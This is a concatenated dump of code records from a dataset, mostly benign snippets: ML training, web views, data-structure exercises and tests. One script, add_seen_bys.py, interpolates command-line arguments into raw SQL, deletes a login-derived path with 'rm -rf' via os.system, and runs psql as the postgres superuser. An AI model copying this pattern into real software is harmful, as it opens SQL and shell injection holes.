tf.control_dependencies(tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\n train_op = self.optimizer.minimize(\n loss_op,\n lr_decay.decay(global_step, total_steps),\n global_step,\n loss_scale=128 if self.use_fp16 else 1)\n\n return {'loss': loss_op, 'acc/top-1': acc_1_op, 'acc/top-5': acc_5_op, 'train': train_op}\n\n def _build_test_ops(self, batch_size: int):\n # get tensors from dataset and predict the output\n features, labels = (self.dataset\n .build(batch_size, is_training=False)\n .make_one_shot_iterator()\n .get_next())\n logits = self.model.call(features, is_training=False)\n\n # calculate loss and accuracy of prediction\n loss_op = softmax_loss(logits, labels)\n acc_1_op = accuracy(logits, labels, top_k=1)\n acc_5_op = accuracy(logits, labels, top_k=5)\n\n return {'loss': loss_op, 'acc/top-1': acc_1_op, 'acc/top-5': acc_5_op}\n","sub_path":"src/util/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"565886339","text":"from morepath.request import Response\nfrom onegov.ballot import Election\nfrom onegov.core.csv import convert_list_of_dicts_to_csv\nfrom onegov.core.custom import json\nfrom onegov.core.security import Public\nfrom onegov.core.utils import normalize_for_url\nfrom onegov.election_day import _\nfrom onegov.election_day import ElectionDayApp\nfrom onegov.election_day.layouts import ElectionLayout\nfrom onegov.election_day.utils import add_last_modified_header\nfrom onegov.election_day.utils.election import get_connection_results_api\nfrom onegov.election_day.utils.election.lists import \\\n get_aggregated_list_results\n\n\n@ElectionDayApp.html(\n model=Election,\n name='data',\n template='election/data.pt',\n permission=Public\n)\ndef view_election_data(self, request):\n\n \"\"\"\" The main view. \"\"\"\n\n layout = ElectionLayout(self, request, 'data')\n\n return {\n 'election': self,\n 'layout': layout\n }\n\n\n@ElectionDayApp.view(\n model=Election,\n name='data-json',\n permission=Public\n)\ndef view_election_data_as_json(self, request):\n\n \"\"\" View the raw data as JSON. \"\"\"\n\n @request.after\n def add_last_modified(response):\n add_last_modified_header(response, self.last_modified)\n\n return Response(\n json.dumps(self.export(), sort_keys=True, indent=2).encode('utf-8'),\n content_type='application/json',\n content_disposition='inline; filename={}.json'.format(\n normalize_for_url(self.title)\n )\n )\n\n\n@ElectionDayApp.view(\n model=Election,\n name='data-csv',\n permission=Public\n)\ndef view_election_data_as_csv(self, request):\n\n \"\"\" View the raw data as CSV. \"\"\"\n\n @request.after\n def add_last_modified(response):\n add_last_modified_header(response, self.last_modified)\n\n return Response(\n convert_list_of_dicts_to_csv(self.export()),\n content_type='text/csv',\n content_disposition='inline; filename={}.csv'.format(\n normalize_for_url(self.title)\n )\n )\n\n\n@ElectionDayApp.view(\n model=Election,\n name='data-parties',\n permission=Public\n)\ndef view_election_parties_data_as_csv(self, request):\n\n \"\"\" View the raw parties data as CSV. \"\"\"\n\n @request.after\n def add_last_modified(response):\n add_last_modified_header(response, self.last_modified)\n\n return Response(\n convert_list_of_dicts_to_csv(self.export_parties()),\n content_type='text/csv',\n content_disposition='inline; filename={}.csv'.format(\n normalize_for_url(\n '{}-{}'.format(\n self.title,\n request.translate(_(\"Parties\")).lower()\n )\n )\n )\n )\n\n\n@ElectionDayApp.json(\n model=Election,\n name='data-aggregated-lists',\n permission=Public\n)\ndef view_election_aggregated_lists_data(self, request):\n\n \"\"\"\" View the lists as JSON. Used to for the lists bar chart. \"\"\"\n\n return get_aggregated_list_results(self, request.session)\n\n\n@ElectionDayApp.json(\n model=Election,\n name='data-list-connections',\n permission=Public\n)\ndef view_election_aggregated_connections_data(self, request):\n\n \"\"\"\" View the lists as JSON. Used to for the lists bar chart. \"\"\"\n\n return get_connection_results_api(self, request.session)\n","sub_path":"src/onegov/election_day/views/election/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":3287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"46341760","text":"\n\"\"\"Depth-First Search Package\"\"\"\n\n\ndef dfs(graph, start):\n \"\"\"Depth-First Search\"\"\"\n # Similar to breadth-first search but differs from it in two ways:\n # 1. it uses a stack (LIFO) instead of a queue, and\n # 2. it delays checking whether a vertex has been discovered until the vertex is popped from\n # the stack rather than making this check before pushing the vertex.\n path = []\n stack = [start]\n\n while stack:\n vertex = stack.pop()\n\n if vertex not in path:\n path.append(vertex)\n stack.extend(graph[vertex])\n\n return path\n","sub_path":"week1/dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"116328893","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Question 1:\n# Implement a stack that supports push and pop operations using standard enqueue and dequeue operations of the queue.\n\n# In[9]:\n\n\nfrom queue import Queue \n \nclass Stack: \n \n def __init__(self): \n \n # Two inbuilt queues \n self.q1 = Queue() \n self.q2 = Queue() \n \n # To maintain current number \n # of elements \n self.curr_size = 0\n \n def push(self, x): \n self.curr_size += 1\n \n # Push x first in empty q2 \n self.q2.put(x) \n \n # Push all the remaining \n # elements in q1 to q2. \n while (not self.q1.empty()): \n self.q2.put(self.q1.queue[0]) \n self.q1.get() \n \n # swap the names of two queues \n self.q = self.q1 \n self.q1 = self.q2 \n self.q2 = self.q \n \n def pop(self): \n \n # if no elements are there in q1 \n if (self.q1.empty()): \n return\n self.q1.get() \n self.curr_size -= 1\n \n def top(self): \n if (self.q1.empty()): \n return -1\n return self.q1.queue[0] \n \n def size(self): \n return self.curr_size \n \ns = Stack() \ns.push(1) \ns.push(2) \ns.push(3) \n \nprint(\"current size: \", s.size()) \nprint(s.top()) \ns.pop() \nprint(s.top()) \ns.pop() \nprint(s.top()) \n \nprint(\"current size: \", s.size())\n\n\n# # Question 2:\n# Implement a queue using a single linked list. (Hint: Enqueuing happens at the tail of the list, and the dequeuing of items happens at the head of the list.)\n\n# In[8]:\n\n\nclass Node: \n \n def __init__(self, data): \n self.data = data \n self.next = None\n \nclass Queue: \n \n def __init__(self): \n self.front = self.rear = None\n \n def isEmpty(self): \n return self.front == None\n \n # Method to add an item to the queue \n def EnQueue(self, item): \n temp = Node(item) \n \n if self.rear == None: \n self.front = self.rear = temp \n return\n self.rear.next = temp \n self.rear = temp \n \n # Method to remove an item from queue \n def DeQueue(self): \n \n if self.isEmpty(): \n return\n temp = self.front \n self.front = temp.next\n \n if(self.front == None): \n self.rear = None\n\nq = Queue() \nq.EnQueue(10) \nq.EnQueue(20) \nq.DeQueue() \nq.DeQueue() \nq.EnQueue(30) \nq.EnQueue(40) \nq.EnQueue(50) \nq.DeQueue() \nprint(\"Queue Front \" + str(q.front.data)) \nprint(\"Queue Rear \" + str(q.rear.data))\n\n\n# # Question 3:\n# Given a positive number n, efficiently generate binary numbers between 1 and n using the queue data structure in linear time.\n# \n# Example:\n# \n# Input:\n# \n# n = 10\n# \n# Output :\n# \n# 1 10 11 100 101 110 111 1000 1001 1010 1011 1100 1101 1110 1111 10000\n\n# In[12]:\n\n\nfrom collections import deque\n \ndef generate(n):\n \n # create an empty queue and enqueue 1\n q = deque()\n q.append('1')\n \n # run `n` times\n for i in range(n):\n # remove the front element\n front = str(q.popleft())\n \n # append 0 and 1 to the front element of the queue and\n # enqueue both strings\n q.append(front + '0')\n q.append(front + '1')\n \n # print the front element\n print(front, end=' ')\n \n \nn = 10\ngenerate(n)\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Week_9.py","file_name":"Week_9.py","file_ext":"py","file_size_in_byte":3378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"502178575","text":"#NEED TO COLLECT ALL WORK HOURS AND REPORT THOSE UNCONNECTED TO WORK ORDERS AND TASKS, CONNECT THEM TO CLIENT AS WELL\nimport tacticenv\nimport os, sys, calendar, dateutil, datetime, time, getopt, pprint, re, math\nfrom pyasm.biz import *\n\n\nopts, login = getopt.getopt(sys.argv[1], '-m')\nopts, codes_to_update = getopt.getopt(sys.argv[2], '-m')\nopts, timestamp = getopt.getopt(sys.argv[3], '-m')\nnote_codes = codes_to_update.split(',')\nmake_ems = ''\nseen_block = '[%s,%s]' % (login,timestamp)\nfor code in note_codes:\n if make_ems == '':\n make_ems = \"update note set seen_by = 'SEEN:' where code = '%s' and (seen_by is NULL or seen_by = '');\" % (code)\n make_ems = \"%s\\nupdate note set seen_by = seen_by || '%s' where code = '%s';\" % (make_ems, seen_block, code)\n else:\n make_ems = \"%s\\nupdate note set seen_by = 'SEEN:' where code = '%s' and (seen_by is NULL or seen_by = '');\" % (make_ems, code)\n make_ems = \"%s\\nupdate note set seen_by = seen_by || '%s' where code = '%s';\" % (make_ems, seen_block, code)\nnote_updater_path = '/var/www/html/note_updating/%s_note_update.sql' % login\nif os.path.exists(note_updater_path):\n os.system('rm -rf %s' % note_updater_path)\nf = open(note_updater_path, 'w')\nf.write(str(make_ems))\nf.close()\nos.system(\"psql -U postgres sthpw < '''%s'''\" % note_updater_path) \n","sub_path":"manual_updaters/add_seen_bys.py","file_name":"add_seen_bys.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"339803891","text":"# coding: utf-8\n\nfrom turtle import *\n\ndef draw_triangle(points, color, turtle):\n turtle.fillcolor(color)\n turtle.up()\n turtle.goto(points[0])\n turtle.down()\n turtle.begin_fill()\n turtle.goto(points[1])\n turtle.goto(points[2])\n turtle.goto(points[0])\n turtle.end_fill()\n\ndef get_mid(p1, p2):\n return ((p1[0] + p2[0]) / 2, (p1[1] + p2[1]) / 2)\n\ndef sierpinksi(points, degree, turtle):\n colormap = ['blue', 'red', 'green', 'white', 'yellow', 'violet', 'orange']\n draw_triangle(points, colormap[degree], turtle)\n\n if degree > 0:\n sierpinksi([points[0],\n get_mid(points[0], points[1]),\n get_mid(points[0], points[2])],\n degree - 1, turtle)\n sierpinksi([points[1],\n get_mid(points[0], points[1]),\n get_mid(points[1], points[2])],\n degree - 1, turtle)\n sierpinksi([points[2],\n get_mid(points[2], points[1]),\n get_mid(points[0], points[2])],\n degree - 1, turtle)\n\n\nturtle = Turtle()\nwin = turtle.getscreen()\npoints = [(-500, -250), (0, 500), (500, -250)]\nsierpinksi(points, 5, turtle)\nwin.exitonclick()","sub_path":"Wk4/sierpinski_triangle.py","file_name":"sierpinski_triangle.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"105269873","text":"#python program to print positive numbers in a list\r\n\r\nnumlist = []\r\n\r\nx=0\r\n\r\n\r\nnumber =int(input(\"enter the total number of list elements: \"))\r\nfor i in range(1,number+1):\r\n value =int(input(\"enter the value of %d element: \" %i))\r\n numlist.append(value)\r\n\r\n\r\n\r\nprint(\"\\npositive numbers in this list are: \")\r\nwhile(x < number):\r\n if(numlist[x] >= 0):\r\n print(numlist[x],end =' ')\r\n x = x+1 \r\n","sub_path":"practice 0.0.py","file_name":"practice 0.0.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"24058885","text":"from collections import defaultdict\r\nlat_eng = defaultdict(list)\r\nfor i in range(int(input())):\r\n eng, lat_translate_part = input().split(' - ')\r\n lat_translate = lat_translate_part.split(', ')\r\n for lat in lat_translate:\r\n lat_eng[lat].append(eng)\r\n\r\nprint(len(lat_eng))\r\nfor lat, eng_translate in sorted(lat_eng.items()):\r\n print(lat + ' - ' + ', '.join(eng_translate))\r\n","sub_path":"4 - dict/task2 - condition.py","file_name":"task2 - condition.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"285897539","text":"\"\"\"\nNeed to move from SQLite to PostgreSQL Database -- что-то уже есть\nThink about merge tasks\n\"\"\"\n\nimport sqlite3 as sqlite\nfrom distutils import dist\nimport time\nimport random as rd\nimport psycopg2\nfrom simplejson import loads, dumps\nfrom configs import db_configs\nfrom psycopg2.extras import Json\nimport logging\nfrom classes import Task\n\ndb = psycopg2.connect(**db_configs)\ncur = db.cursor()\n\n#\"CREATE TABLE users(user_id SERIAL, user_name TEXT, vk_uid INTEGER, tg_uid INTEGER);\"\n\ndef get_last_user_id():\n cur.execute(\"SELECT * FROM users ORDER BY id DESC LIMIT 1;\")\n return cur.fetchone()\n\n\ndef add_vk_id(user_id, vk_uid):\n cur.execute(\"\"\"\n UPDATE users SET vk_uid = %s\n WHERE user_id = %s;\n \"\"\", \n (vk_uid, user_id))\n db.commit()\n\n\ndef add_tg_id(user_id, tg_uid):\n cur.execute(\"\"\"\n UPDATE users SET tg_uid = %s\n WHERE user_id = %s;\n \"\"\", \n (tg_uid, user_id))\n db.commit()\n\n\ndef add_user(user_name, mode, chat_uid):\n cur.execute(\"SELECT * FROM users WHERE user_name = %s\", (user_name,))\n if not cur.fetchone():\n cur.execute(\"\"\"\n INSERT INTO users (user_name)\n VALUES (%s);\n \"\"\",\n (user_name,))\n db.commit()\n user_id = get_last_user_id()\n if mode == 'vk':\n add_vk_id(user_id, chat_uid)\n else:\n add_tg_id(user_id, chat_uid)\n else:\n logging.critical('User already exists')\n\n\"\"\"\nСорян, что на русском\nЧе за quot???\nНигде про это нет\nИ kickass???\nУ нас нет таблички motivate...\n\"\"\"\n\ndef quot():\n i = rd.randint(1, 767)\n print(i)\n db = sqlite.connect(\"C:/Users/Nick/Desktop/clientbase.db\")\n cur = db.cursor()\n cur.execute(\"SELECT * FROM Quotations WHERE id = (?)\", (i,))\n string = cur.fetchone()\n return (str(string[1]) + string[2])\n db.close()\n\n\ndef kickass():\n i = rd.randint(1, 767)\n print(i)\n db = sqlite.connect(\"C:/Users/Nick/Desktop/clientbase.db\")\n cur = db.cursor()\n cur.execute(\"SELECT * FROM motivate WHERE id = (?)\", (i,))\n db.close()\n\n\"\"\"\nПошел осмысленный код\n\"\"\"\n\n#\"CREATE TABLE task_history(id SERIAL PRIMARY KEY, task JSONB, uid INTEGER);\"\n\ndef get_last_task_id():\n cur.execute(\"SELECT * FROM task_history ORDER BY id DESC LIMIT 1;\")\n return cur.fetchone()\n\n\"\"\"\nСюда придет class Task\n\"\"\"\n\ndef add_task(user_id, task):\n task_json = task.json()\n cur.execute(\"\"\"\n INSERT INTO task_history (task, uid)\n VALUES (%s, %s);\n \"\"\",\n (task_json, user_id))\n db.commit()\n\ndef set_todo(user_id, activity_name, start_time, finish_time, description, frequency):\n db = sqlite.connect(\"C:/Users/Nick/Desktop/clientbase.db\")\n cur = db.cursor()\n cur.execute(\"SELECT * FROM users WHERE user_id = ?\", (str(user_id),))\n is_todo = cur.fetchone()\n if is_todo[5]:\n cur.execute(\n \"INSERT INTO '{table}' (activity_name, start_time, finish_time, description, frequency) VALUES (?,?,?,?,?)\".format(table=user_id), (activity_name, start_time, finish_time, description, frequency,))\n db.commit()\n else:\n s = '''CREATE TABLE {table} (id\tINTEGER,activity_name\tTEXT, start_time\tREAL, finish_time\tREAL, description\tTEXT, frequency\tINTEGER, PRIMARY KEY(id))'''.format(table=user_id)\n cur.execute(s)\n cur.execute(\"UPDATE users SET todos_t_name = {name} WHERE user_id = {id}\".format(id=user_id, name=user_id))\n db.commit()\n db.close()\n\n\ndef get_todo(user_id):\n db = sqlite.connect(\"clientbase.db\")\n cur = db.cursor()\n try:\n cur.execute(\"SELECT * FROM '{table}'\".format(table=str(time.gmtime(time.time()).tm_mon)+'-'+str(time.gmtime(time.time()).tm_mday)))\n except Exception as e:\n print(e)\n cur.execute(\"CREATE TABLE %s(id INTEGER PRIMARY KEY, activity_name TEXT,\"\n \"start_time REAL, finish_time REAL,\"\n \" description TEXT\" % str(str(time.gmtime(time.time())[1])+'-'+str(time.gmtime(time.time())[2])))\n return None\n data = cur.fetchall()\n return data\n","sub_path":"code/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"302897238","text":"# -*- coding: UTF-8 -*-\nfrom __future__ import unicode_literals\n\nimport ast\n\nfrom django.db import models\n\n# Create your models here.\nclass JsonResponseStatus(object):\n erroDic = {\n '200': '成功',\n #300-399 for usererror\n '300': '用户名已存在',\n '301':'密码长度不能少于6位',\n '302':'用户不存在',\n '303': '密码错误',\n '304':'用户信息保存失败',\n '305':'请先登录',\n '306':'该手机号已经被绑定',\n '307':'手机号码不合法',\n '308':'非法用户名',\n #400-499 for business\n '400':'删除图片失败',\n '401':'发布信息保存失败',\n '402':'搜索不到相关内容',\n #500-599 for http error\n '500':'请求参数错误',\n # 600-699 for sms error\n '600':'短信发送失败',\n '601':'验证码已过期',\n '602': '验证码错误',\n # 700-700 for app update\n '700':'版本已经是最新',\n }\n\n def __init__(self, erro_code):\n self.erro_code = erro_code\n self.erro_msg = self.erroDic[str(erro_code)]\n\ndef parse_list(value):\n list = value.split(',')\n result = []\n for s in list:\n if s != '':\n result.append(s)\n return result\n\n\nclass ListField(models.TextField):\n # __metaclass__ = models.SubfieldBase\n description = \"Stores a python list\"\n\n def __init__(self, *args, **kwargs):\n super(ListField, self).__init__(*args, **kwargs)\n\n def from_db_value(self, value, expression, connection, context):\n if value is None:\n return value\n return parse_list(value)\n\n def to_python(self, value):\n if isinstance(value, list):\n return value\n\n if value is None:\n return value\n\n return parse_list(value)\n\n\n def get_prep_value(self, value):\n result = ''\n for x in value:\n result = result+x + ','\n return result","sub_path":"commonfunction/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"226843050","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport lightgbm as lgb\nfrom sklearn import datasets\nfrom sklearn import metrics\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.model_selection import train_test_split\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import StratifiedKFold, KFold\nimport numpy.random as rd\nfrom sklearn.metrics import accuracy_score, recall_score, precision_score, f1_score\nfrom sklearn.model_selection import train_test_split\nimport optuna, os, uuid, pickle\n\ndf = pd.read_feather('val_nms030_tta7_first_5models_soft_prob.feather')\ntarget = df.target\n\ndef target_reverse(value):\n return 1 - value\n\ntarget = target.map(target_reverse)\ntmp_df = df[df.columns.drop('target')]\n\n# taken from https://www.kaggle.com/kenmatsu4/using-trained-booster-from-lightgbm-cv-w-callback\nclass ModelExtractionCallback(object):\n \"\"\"Callback class for retrieving trained model from lightgbm.cv()\n NOTE: This class depends on '_CVBooster' which is hidden class, so it might doesn't work if the specification is changed.\n \"\"\"\n\n def __init__(self):\n self._model = None\n\n def __call__(self, env):\n # Saving _CVBooster object.\n self._model = env.model\n\n def _assert_called_cb(self):\n if self._model is None:\n # Throw exception if the callback class is not called.\n raise RuntimeError('callback has not called yet')\n\n @property\n def boosters_proxy(self):\n self._assert_called_cb()\n # return Booster object\n return self._model\n\n @property\n def raw_boosters(self):\n self._assert_called_cb()\n # return list of Booster\n return self._model.boosters\n\n @property\n def best_iteration(self):\n self._assert_called_cb()\n # return boosting round when early stopping.\n return self._model.best_iteration\n\nrd_seed = 42\nrd.seed(rd_seed)\n\nX_train, y_train = tmp_df, target\nlgb_train = lgb.Dataset(X_train, y_train)\nextraction_cb = ModelExtractionCallback()\n\ncallbacks = [\n extraction_cb,\n]\n\nbooster_name = 'models/booster_for_val_nms030_tta7_first_5models_soft_prob.pkl'\n\nlgbm_params = {\n 'boosting': 'gbdt',\n 'objective': 'binary',\n 'metric': {'binary_logloss'},\n 'max_depth': 7,\n 'max_bin': 255,\n 'lambda_l1': 1.5464112458912599e-06,\n 'lambda_l2': 5.346737781503549e-06,\n 'num_leaves': 140,\n 'feature_fraction': 0.8534057661739842,\n 'bagging_fraction': 0.9376615592819334,\n 'bagging_freq': 1,\n 'min_child_samples': 72\n }\n\n\n# Training settings\nFOLD_NUM = 5\nfold_seed = 7\nfolds = StratifiedKFold(n_splits=FOLD_NUM, shuffle=True, random_state=fold_seed)\n# Fitting\nret = lgb.cv(params=lgbm_params,\n train_set=lgb_train,\n folds=folds,\n num_boost_round=200,\n verbose_eval = 10,\n early_stopping_rounds=50,\n callbacks=callbacks,\n)\n\n# Retrieving booster and training information.\nproxy = extraction_cb.boosters_proxy\nboosters = extraction_cb.raw_boosters\nbest_iteration = extraction_cb.best_iteration\n\nwith open(booster_name, \"wb\") as f:\n pickle.dump(boosters, f)\n\nprint(\"saved:\", booster_name)\n","sub_path":"scripts/gen_first_model_false_positive_detector.py","file_name":"gen_first_model_false_positive_detector.py","file_ext":"py","file_size_in_byte":3172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"439865292","text":"from distutils.core import setup, Extension\n\nimport os.path\nimport sys\n\n\ncmatcher = Extension(\n 'cmatcher', sources=['cmatcher.c'],\n libraries=[], include_dirs=['../request'],\n library_dirs=[], extra_link_args=[],\n extra_compile_args=[])\n\nsetup(\n name='cmatcher', version='1.0', description='',\n ext_modules=[cmatcher])\n","sub_path":"evolution/evolution_017/router/build_cmatcher.py","file_name":"build_cmatcher.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"309513652","text":"import os\nfrom eve import Eve\nfrom src.validators.uuidv4 import UUIDValidator\nfrom src.encoders.encoder import Encoder\nfrom eve_auth_jwt import JWTAuth\n\n\n# Heroku support: bind to PORT if defined, otherwise default to 5000.\nif 'PORT' in os.environ:\n port = int(os.environ.get('PORT'))\n # use '0.0.0.0' to ensure your REST API is reachable from all your\n # network (and not only your computer).\n host = '0.0.0.0'\nelse:\n port = 5000\n host = '127.0.0.1'\n\napp = Eve(\n auth=JWTAuth,\n json_encoder=Encoder,\n validator=UUIDValidator)\n\n\nif __name__ == '__main__':\n app.run(host=host, port=port)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"31345914","text":"import zmq\nfrom amonpy.config import config\n\nclass ZeroMQHandler():\n def __init__(self, socktype=zmq.DEALER):\n self.ctx = zmq.Context.instance()\n self.socket = zmq.Socket(self.ctx, socktype)\n self.socket.setsockopt(zmq.LINGER, 100)\n # As there is no high water mark set - we don't really need this\n # Additionally, its not possible to set location of these yet\n # https://zeromq.jira.com/browse/LIBZMQ-410\n #self.socket.setsockopt(zmq.SWAP, 25000000) # 25MB disk swap\n \n address = \"tcp://{0}\".format(config.address)\n self.socket.connect(address)\n\n def close(self):\n self.socket.close()\n\n def post(self, data, type=None):\n data = {\"type\": type, \"content\" : data}\n if config.secret_key:\n data['secret_key'] = config.secret_key\n \n self.socket.send_json(data, zmq.NOBLOCK)\n\nzeromq_handler = ZeroMQHandler()\n\n","sub_path":"amonpy/protocols/zeromq.py","file_name":"zeromq.py","file_ext":"py","file_size_in_byte":929,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"279942400","text":"\ndef next_regular(target):\n r\"\"\"Copied from scipy.signal.fftconvolve\n Find the next regular number greater than or equal to target.\n Regular numbers are composites of the prime factors 2, 3, and 5.\n Also known as 5-smooth numbers or Hamming numbers, these are the optimal\n size for inputs to FFTPACK.\n Target must be a positive integer.\n \"\"\"\n if target <= 6:\n return target\n\n # Quickly check if it's already a power of 2\n if not (target & (target - 1)):\n return target\n\n match = float('inf') # Anything found will be smaller\n p5 = 1\n while p5 < target:\n p35 = p5\n while p35 < target:\n # Ceiling integer division, avoiding conversion to float\n # (quotient = ceil(target / p35))\n quotient = -(-target // p35)\n\n # Quickly find next power of 2 >= quotient\n try:\n p2 = 2 ** ((quotient - 1).bit_length())\n except AttributeError:\n # Fallback for Python <2.7\n p2 = 2 ** (len(bin(quotient - 1)) - 2)\n\n n = p2 * p35\n if n == target:\n return n\n elif n < match:\n match = n\n p35 *= 3\n if p35 == target:\n return p35\n if p35 < match:\n match = p35\n p5 *= 5\n if p5 == target:\n return p5\n if p5 < match:\n match = p5\n return match\n\n\ndef cross_correlate(in1, in2, axis=0):\n r\"\"\"Cross-correlation of matrices along given axis.\n Usually used in time-correlation, one axis is enough. Don't\n use this function to calculate autocorrelation, for\n cross_correlate(in1, in1[::-1]) is on interval [-len(in1), len(in1)),\n not on [0, len(in1)), in this case, output[len(in1)-1:] is the correct\n output for in1 == in2 or in1.size == in2.size, due to `np.flip` is\n applied on in2 here. Or generally,\n ifft(fft(a, n=na+nb-1) * fft(b, n=na+nb-1).conj())[:na] ==\n np.correlate(a, b, 'full')[nb-1:] for na >= nb... See `same' and `valid' mode\n in `scipy.fft.convolve' (`_centered' function).\n\n >>> a = np.random.random(10)\n >>> b = np.random.random(10)\n >>> np.allclose(ifft(fft(a,19)*fft(b,19).conj())[:10], np.correlate(a,b,'full')[9:])\n True\n\n :param in1: np.ndarray\n :param in2: np.ndarray\n :param axis: int\n :return: np.ndarray, `full' mode of np.correlate result.\n \"\"\"\n fft = np.fft.rfft\n ifft = np.fft.irfft\n if (np.issubdtype(in1.dtype, np.complex) or\n np.issubdtype(in2.dtype, np.complex)):\n fft = np.fft.fft\n ifft = np.fft.ifft\n s1 = in1.shape[axis]\n s2 = in2.shape[axis]\n s = s1 + s2 - 1\n f = next_regular(s)\n return ifft(fft(in1, axis=axis, n=f) *\n fft(np.flip(in2, axis=axis).conj(), axis=axis, n=f),\n axis=axis, n=f)[:s]\n\nfrom ._mat_ac import vec_ac\nfrom ._mat_ac import mat_ac\nimport numpy as np\n","sub_path":"yamddpp/TimeCorrelation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"511268674","text":"from django.views.decorators.csrf import csrf_exempt\nfrom .models import *\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.views import LoginView , LogoutView\nfrom django.contrib.auth import login as auth_login\nfrom .form import *\nfrom django.utils import timezone\n\n\n# Create your views here.\n\n\ndef home(request):\n return render(request,'base.html')\n\n\ndef index(request):\n return render(request,'index.html')\n\n\ndef blockchain(request):\n return render(request,'new.html')\n\n\ndef employee(request):\n obj=Employee.objects.all()\n myform=NewEmp()\n return render(request,'employee.html',{'obj':obj},{'myform':NewEmp})\n\n\ndef department(request):\n dept=Department.objects.all()\n return render(request,'department.html',{'dept':dept})\n\n\n@login_required\ndef signup(request):\n if request.method=='POST':\n form =signUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n auth_login(request,user)\n return redirect('home')\n else :\n form = signUpForm()\n return render (request,'signup.html',{'form':form})\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"company/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"383707379","text":"# Copyright 2020, The TensorFlow Federated Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom absl.testing import absltest\nfrom jax.lib.xla_bridge import xla_client\nimport numpy as np\n\nfrom google.protobuf import any_pb2\nfrom tensorflow_federated.experimental.python.core.impl.utils import xla_serialization\nfrom tensorflow_federated.proto.v0 import computation_pb2 as pb\nfrom tensorflow_federated.python.core.api import computation_types\nfrom tensorflow_federated.python.core.impl.types import type_serialization\n\n\ndef _make_test_xla_comp():\n builder = xla_client.XlaBuilder('comp')\n xla_client.ops.Constant(builder, np.int32(10))\n return builder.build()\n\n\nclass XlaUtilsTest(absltest.TestCase):\n\n def test_pack_xla_computation(self):\n xla_comp = _make_test_xla_comp()\n any_pb = xla_serialization.pack_xla_computation(xla_comp)\n self.assertEqual(type(any_pb), any_pb2.Any)\n\n def test_pack_unpack_xla_computation_roundtrip(self):\n xla_comp = _make_test_xla_comp()\n any_pb = xla_serialization.pack_xla_computation(xla_comp)\n new_comp = xla_serialization.unpack_xla_computation(any_pb)\n self.assertEqual(new_comp.as_hlo_text(), xla_comp.as_hlo_text())\n\n def test_create_xla_tff_computation(self):\n xla_comp = _make_test_xla_comp()\n comp_pb = xla_serialization.create_xla_tff_computation(\n xla_comp, computation_types.FunctionType(None, np.int32))\n self.assertIsInstance(comp_pb, pb.Computation)\n self.assertEqual(comp_pb.WhichOneof('computation'), 'xla')\n type_spec = type_serialization.deserialize_type(comp_pb.type)\n self.assertEqual(str(type_spec), '( -> int32)')\n xla_comp = xla_serialization.unpack_xla_computation(comp_pb.xla.hlo_module)\n self.assertIn('ROOT constant.1 = s32[] constant(10)',\n xla_comp.as_hlo_text())\n self.assertEqual(str(comp_pb.xla.parameter), '')\n self.assertEqual(str(comp_pb.xla.result), 'tensor {\\n' ' index: 0\\n' '}\\n')\n\n\nif __name__ == '__main__':\n absltest.main()\n","sub_path":"tensorflow_federated/experimental/python/core/impl/utils/xla_serialization_test.py","file_name":"xla_serialization_test.py","file_ext":"py","file_size_in_byte":2489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} 